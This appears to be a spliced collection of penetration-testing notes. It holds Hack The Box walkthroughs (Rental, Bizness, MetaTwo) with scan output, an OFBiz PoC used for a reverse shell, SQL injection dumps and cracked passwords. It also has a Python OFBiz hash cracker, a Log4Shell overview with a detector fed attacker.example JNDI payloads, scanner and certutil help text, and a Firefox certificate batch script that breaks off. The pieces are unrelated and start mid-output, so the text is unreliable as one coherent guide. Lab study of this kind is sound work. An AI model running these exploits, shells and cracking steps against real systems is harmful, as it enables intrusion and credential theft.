Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
```
```
www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 217
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for manager@localhost                                                                                  |
+---------------------------------------------------------------------------------------------------------------+
| GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' |
| GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost`                                            |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)
```

Note the global FILE privilege: it lets this account read and write files on the database host with LOAD DATA INFILE and SELECT ... INTO OUTFILE (within the limits of secure_file_priv), which is far more than the application needs and a useful lever for further escalation.
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbitrary file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST
Nmap scan report for bizness.htb (10.129.232.1)
Host is up (0.040s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
443/tcp   open  https
41845/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
```
```
echo "10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# update-alternatives --config java
There are 3 choices for the alternative java (providing /usr/bin/java).

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# java --version
openjdk 11.0.20-ea 2023-07-18
OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
```
Start tcpdump to catch the ICMP traffic the PoC will generate:

```
sudo tcpdump -i 2 icmp
```
Run the PoC:

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8"
Not Sure Worked or not
```
Inspect the captured packets:

```
┌──(root@kali)-[/home/h4m5t/Desktop]
└─# tcpdump -i 2 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
21:47:38.693694 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64
21:47:38.693728 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64
21:47:39.695235 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64
21:47:39.695274 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
```
The echo requests arriving from bizness.htb confirm that the command executed, so the RCE works. Next, get a reverse shell: start an nc listener first, then run the exploit in shell mode.

```
nc -nlvp 4444
```

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444
Not Sure Worked or not
```
```
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash
# -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() --
password.encrypt.hash.type=SHA
```
```java
cat HashCrypt.java
/*******************************************************************************
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 *******************************************************************************/
package org.apache.ofbiz.base.crypto;
```
```java
    private static boolean doCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) {
        int typeEnd = crypted.indexOf("}");
        String hashType = crypted.substring(1, typeEnd);
        String hashed = crypted.substring(typeEnd + 1);
        MessageDigest messagedigest = getMessageDigest(hashType);
        messagedigest.update(bytes);
        byte[] digestBytes = messagedigest.digest();
        char[] digestChars = Hex.encodeHex(digestBytes);
        String checkCrypted = new String(digestChars);
        if (hashed.equals(checkCrypted)) {
            return true;
        }
        // This next block should be removed when all {prefix}oldFunnyHex are fixed.
        if (hashed.equals(oldFunnyHex(digestBytes))) {
            Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted);
            return true;
        }
        return false;
    }
```
```java
    /*
     * @deprecated use cryptBytes(hashType, salt, password); eventually, use
     * cryptUTF8(hashType, salt, password) after all existing installs are
     * salt-based. If the call-site of cryptPassword is just used to create a *new*
     * value, then you can switch to cryptUTF8 directly.
     */
    @Deprecated
    public static String cryptPassword(String hashType, String salt, String password) {
        if (hashType.startsWith("PBKDF2")) {
            return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null;
        }
        return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null;
    }
```
```java
            messagedigest.update(strBytes);
            return oldFunnyHex(messagedigest.digest());
        } catch (Exception e) {
            Debug.logError(e, "Error while computing hash of type " + hashType, module);
        }
        return str;
    }
```
```java
    // This next block should be removed when all {prefix}oldFunnyHex are fixed.
    private static String oldFunnyHex(byte[] bytes) {
        int k = 0;
        char[] digestChars = new char[bytes.length * 2];
        for (byte b : bytes) {
            int i1 = b;
```
```
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
```
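To make the hash handling in the excerpt concrete, here is an added Python example (not OFBiz code) that re-implements the two stored formats HashCrypt accepts: the salted form produced by `cryptBytes`, `$TYPE$salt$` followed by the unpadded URL-safe base64 of digest(salt || password), and the legacy `{TYPE}hex` form that `doCompareTypePrefix` above checks. With `password.encrypt.hash.type=SHA`, TYPE is `SHA`, which java.security.MessageDigest treats as SHA-1. The example also converts a stored value into the `hash:salt` line that hashcat mode 120 (`sha1($salt.$pass)`) expects, which is the conversion needed before a run like the one shown above. The salt and password are constructed for the demonstration and are not the box's values.

```python
import base64
import hashlib
import hmac

# java.security.MessageDigest algorithm names -> hashlib names
JAVA_TO_HASHLIB = {"SHA": "sha1", "SHA-1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512", "MD5": "md5"}
# hashcat modes: salted sha1($salt.$pass) is -m 120, the unsalted legacy {SHA}hex form is plain SHA1, -m 100
HASHCAT_SALTED = {"SHA": 120, "SHA-1": 120}
HASHCAT_PLAIN = {"SHA": 100, "SHA-1": 100}


def digest_bytes(hash_type: str, salt: str, password: str) -> bytes:
    """digest(salt || password): the order HashCrypt.getCryptedBytes feeds MessageDigest."""
    h = hashlib.new(JAVA_TO_HASHLIB[hash_type])
    h.update(salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    return h.digest()


def ofbiz_crypt(hash_type: str, salt: str, password: str) -> str:
    """Salted form written by HashCrypt.cryptBytes: $TYPE$salt$<urlsafe base64, no padding>."""
    encoded = base64.urlsafe_b64encode(digest_bytes(hash_type, salt, password)).decode("ascii").rstrip("=")
    return f"${hash_type}${salt}${encoded}"


def ofbiz_verify(stored: str, password: str) -> bool:
    """Check a password against either stored form; the comparison is constant-time."""
    if stored.startswith("$"):
        _, hash_type, salt, _encoded = stored.split("$", 3)
        return hmac.compare_digest(ofbiz_crypt(hash_type, salt, password), stored)
    if stored.startswith("{"):
        # Legacy {TYPE}hex form handled by doCompareTypePrefix above: unsalted hex digest
        hash_type, hexdigest = stored[1:].split("}", 1)
        return hmac.compare_digest(digest_bytes(hash_type, "", password).hex(), hexdigest)
    raise ValueError("unrecognised OFBiz password hash format")


def to_hashcat(stored: str):
    """Return (mode, line) for hashcat: it wants a hex digest, and 'hash:salt' for salted modes."""
    if stored.startswith("$"):
        _, hash_type, salt, encoded = stored.split("$", 3)
        raw = base64.urlsafe_b64decode(encoded + "=" * (-len(encoded) % 4))  # restore padding
        return HASHCAT_SALTED[hash_type], f"{raw.hex()}:{salt}"
    hash_type, hexdigest = stored[1:].split("}", 1)
    return HASHCAT_PLAIN[hash_type], hexdigest


def crack(stored: str, wordlist):
    """Offline dictionary attack; returns the matching password or None."""
    for candidate in wordlist:
        if ofbiz_verify(stored, candidate):
            return candidate
    return None


# Constructed demo values (not the hash or password from the box)
DEMO_PASSWORD = "monkey-demo"
DEMO_STORED = ofbiz_crypt("SHA", "d", DEMO_PASSWORD)
DEMO_LEGACY = "{SHA}" + digest_bytes("SHA", "", DEMO_PASSWORD).hex()

if __name__ == "__main__":
    print("stored :", DEMO_STORED)
    print("hashcat:", to_hashcat(DEMO_STORED))
    print("cracked:", crack(DEMO_STORED, ["123456", "password", DEMO_PASSWORD]))
```

A one-character salt such as `d` adds nothing against a dictionary run: the salt is stored in the clear and hashcat simply prepends it, so an unsalted-speed SHA-1 wordlist attack is the realistic threat for this format.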
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
```mermaid
graph LR
    A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
    C -->|Yes| D[Execute<br>JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to<br>attacker's server]
    F --> G[Download &<br>execute<br>malicious codes]
    G --> H[Attacker gains<br>server control]
```
Incident Timeline
```mermaid
timeline
    title Log4j Vulnerability Incident Timeline
    November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache
    December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0)
    December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware
    December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert
    December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack
    December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
```
Mitigations

The Log4j vulnerability, also known as **Log4Shell (CVE-2021-44228)**, is a critical remote code execution (RCE) vulnerability in Apache Log4j 2. An attacker who can get a malicious JNDI (Java Naming and Directory Interface) lookup string into any logged message can make the server fetch and execute attacker-supplied code.
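The decision box in the diagram, "contains JNDI lookup?", is harder than a substring search for `${jndi:` because Log4j resolves nested lookups before the JNDI one runs, so attackers hide it behind `${lower:j}`, `${upper:...}` or the default-value form `${::-j}`. The added Python example below (not from the original post) collapses those inner lookups the way Log4j would and then flags JNDI lookups over access-log lines constructed for the demo.

```python
import re

# Innermost ${...} lookup: a body with no nested '$', '{' or '}'
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with one of the protocols Log4j's JndiLookup would hand to InitialContext
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)
_MAX_ROUNDS = 20  # bound the collapsing loop against hostile, deeply nested input


def _resolve_one(body: str) -> str:
    """Evaluate one lookup body the way the obfuscation tricks rely on."""
    if ":-" in body:
        # ${prefix:name:-default}: an undefined lookup falls back to its default, so
        # ${::-j}, ${env:NOPE:-j} and friends all evaluate to the literal default
        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    # Anything else (jndi:, java:, date:, ...) is left in place for the detector
    return "${" + body + "}"


def deobfuscate(text: str) -> str:
    """Collapse nested or obfuscated lookups until the string stops changing."""
    for _ in range(_MAX_ROUNDS):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (index, normalised line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        normalised = deobfuscate(line)
        if _JNDI.search(normalised):
            hits.append((i, normalised))
    return hits


# Constructed sample access-log lines (not real traffic)
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:J}${::-n}di:${lower:LDAP}://attacker.example/b}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${upper:rmi}://attacker.example:1099/c}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${java:version}"',  # a lookup, but not a JNDI one
]

if __name__ == "__main__":
    for idx, line in scan(SAMPLE_LOGS):
        print(f"line {idx}: {line}")
```

The resolver handles only the lookups commonly used for obfuscation (`lower`, `upper` and `:-` defaults); a `${date:'j'}`-style trick needs the same treatment. This is detection for logs you already have; the mitigation remains the upgrade described in the CVE text, or, on versions you cannot upgrade, removing the JndiLookup class from log4j-core.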
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─# nmap -sV $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining)
Nmap scan report for 10.129.231.241
Host is up (0.0093s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
```
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
```
[15:30:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.24, Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:30:38] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'

[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
```
```
   #  Name                                                     Disclosure Date  Rank    Check  Description
   -  ----                                                     ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_bookingpress_category_services_sqli  2022-02-28       normal  Yes    Wordpress BookingPress bookingpress_front_get_category_services SQLi

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli

msf6 > use 0
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb
RHOST => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/
TARGETURI => /events/
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.129.231.241

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (manager)
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# ftp metapress.htb@$IP
Connected to 10.129.231.241.
220 ProFTPD Server (Debian) [::ffff:10.129.231.241]
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
First, generate a crackable hash from the private GPG key with gpg2john and save it to a file named key.hash. Running john against it then produced an error:

```
Crash recovery file is locked: /root/.john/john.rec
```

Fix: remove the stale recovery file. Only do this when no other john session is running, since the lock exists to stop two sessions from clobbering the same session state.

```
rm /root/.john/john.rec
```
Start cracking:

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)
1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
```
COMMANDS:
   webscan, ws       Run a webscan task
   servicescan, ss   Run a service scan task
   subdomain, sd     Run a subdomain task
   poclint, pl, lint lint yaml poc
   burp-gamma, btg   Convert the export file of burp historical proxy records to POC format
   transform         transform other script to gamma
   reverse           Run a standalone reverse server
   convert           convert results from json to html or from html to json
   genca             GenerateToFile CA certificate and key
   upgrade           check new version and upgrade self if any updates found
   version           Show version info
   x                 A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file.
   help, h           Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --config FILE      Load configuration from FILE (default: "config.yaml")
   --log-level value  Log level, choices are debug, info, warn, error, fatal
   --help, -h         show help
[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml

OPTIONS:
   --list, -l                                  list plugins
   --plugins value, --plugin value, --plug value  specify the plugins to run, separated by ','
   --poc value, -p value                       specify the poc to run, separated by ','
   --level value                               specify the level of poc to run, separated by ','
   --tags value                                specify the level of poc to run, separated by ','

   --listen value                              use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
   --basic-crawler value, --basic value        use a basic spider to crawl the target and scan the requests
   --browser-crawler value, --browser value    use a browser spider to crawl the target and scan the requests
   --url-file value, --uf value                read urls from a local file and scan these urls, one url per line
   --burp-file value, --bf value               read requests from burpsuite exported file as targets
   --url value, -u value                       scan a **single** url
   --data value, -d value                      data string to be sent through POST (e.g. 'username=admin')
   --raw-request FILE, --rr FILE               load http raw request from a FILE
   --force-ssl, --fs                           force usage of SSL/HTTPS for raw-request

   --json-output FILE, --jo FILE               output xray results to FILE in json format
   --html-output FILE, --ho FILE               output xray result to FILE in HTML format
   --webhook-output value, --wo value          post xray result to url in json format
```
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml

Enabled plugins: [phantasm]

[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/

[Vuln: phantasm]
Target           "http://example.com/"
VulnType         "poc-yaml-jumpserver-session-replay-unauth/default"
Author           "Chaitin"
Links            ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H
-A              Add a certificate to the database (create if needed)
-E              Add an Email certificate to the database (create if needed)
   -n cert-name      Specify the nickname of the certificate to add
   -t trustargs      Set the certificate trust attributes:
                        p   valid peer
                        P   trusted peer (implies p)
                        c   valid CA
                        T   trusted CA to issue client certs (implies c)
                        C   trusted CA to issue server certs (implies c)
                        u   user cert
                        w   send warning
                        g   make step-up cert
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -a                The input certificate is encoded in ASCII (RFC1113)
   -i input          Specify the certificate file (default is stdin)

-C              Create a new binary certificate from a BINARY cert request
   -c issuer-name    The nickname of the issuer cert
   -i cert-request   The BINARY certificate request file
   -o output-cert    Output binary cert to this file (default is stdout)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension

-G              Generate a new key pair
   -h token-name     Name of token in which to generate key (default is internal)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -g key-size       Key size in bits, (min 512, max 2048, default 1024)
   -y exp            Set the public exponent value (3, 17, 65537) (rsa only)
   -f password-file  Specify the password file
   -z noisefile      Specify the noise file to be used
   -q pqgfile        read PQG value from pqgfile (dsa only)
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-D              Delete a certificate from the database
   -n cert-name      The nickname of the cert to delete
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-U              List all modules
   -d moddir         Module database directory (default is '~/.netscape')
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-K              List all keys
   -h token-name     Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)
   -k key-type       Type of key pair to list ("all", "dsa", "rsa" (default))
   -f password-file  Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-L              List all certs, or print out a single named cert
   -n cert-name      Pretty print named cert (list all if unspecified)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W
   -r                For single cert, print binary DER encoding
   -a                For single cert, print ASCII encoding (RFC1113)

-M              Modify trust attributes of certificate
   -n cert-name      The nickname of the cert to modify
   -t trustargs      Set the certificate trust attributes (see -A above)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-N              Create a new certificate database
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-T              Reset the Key database or token
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -h token-name     Token to reset (default is internal)

-O              Print the chain of a certificate
   -n cert-name      The nickname of the cert to modify
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-R              Generate a certificate request (stdout)
   -s subject        Specify the subject name (using RFC1485)
   -o output-req     Output the cert request to this file
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -f pwfile         Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -a                Output the cert request in ASCII (RFC1113); default is binary

-V              Validate a certificate
   -n cert-name      The nickname of the cert to Validate
   -b time           validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")
   -e                Check certificate signature
   -u certusage      Specify certificate usage:
                        C   SSL Client
                        V   SSL Server
                        S   Email signer
                        R   Email Recipient
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-S              Make a certificate and add to database
   -n key-name       Specify the nickname of the cert
   -s subject        Specify the subject name (using RFC1485)
   -c issuer-name    The nickname of the issuer cert
   -t trustargs      Set the certificate trust attributes (see -A above)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension
@echo off
:: enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set regValue=""

set Value1="checkversion"

rem check whether the new-version registry key exists
rem (inside parenthesised blocks use rem, not ::, a :: label there breaks the block)
reg query %regPath1% >nul 2>nul
echo %errorlevel%
echo !errorlevel!
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        if "%regValue%"=="" (
            echo value not exists
        ) else (
            set Value1=%%b
        )
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem check whether the old-version registry path exists
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            if "%regValue%"=="" (
                echo value not exists
            ) else (
                set Value1=%%b
            )
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )
    echo !Value1!
    echo %Value1%
    rem %Value1% is expanded when this whole block is parsed, so Major is only
    rem meaningful after the block; it is recomputed below with the final value.
    set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
    echo Majorold: %Major%
)

echo !Value1!
echo %Value1%
rem split "a.b.c ..." on the dots: Major gets the first field, the rest go through set /A
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem check the version number (the original compared an undefined %final_version%,
rem which is a syntax error at run time; compare the detected value instead)
if "%Value1%"=="0.0.0" (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)

rem exit the script
exit /b

:function1
echo Program version is less than 49. Executing function 1...
rem function 1: for Firefox below 49, update the cert8.db certificate store.

rem show the certificates already in the db
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set default_name=""
rem check whether the certificate database path exists
IF EXIST %db_path% (
    echo default_path exists
    rem add the commands to run here
    set "count=0"
    for /d %%i in ("%db_path%\*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem check that there is exactly one *.default folder
    if !count! equ 1 (
        set default_name=!folder!
        set "all_path=%db_path%!default_name!"
        rem show the full path of the default folder
        echo !all_path!
        rem show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
        rem update the certificate store
        rem note: "u,u,u" marks the entry as a user cert; for Firefox to trust this CA
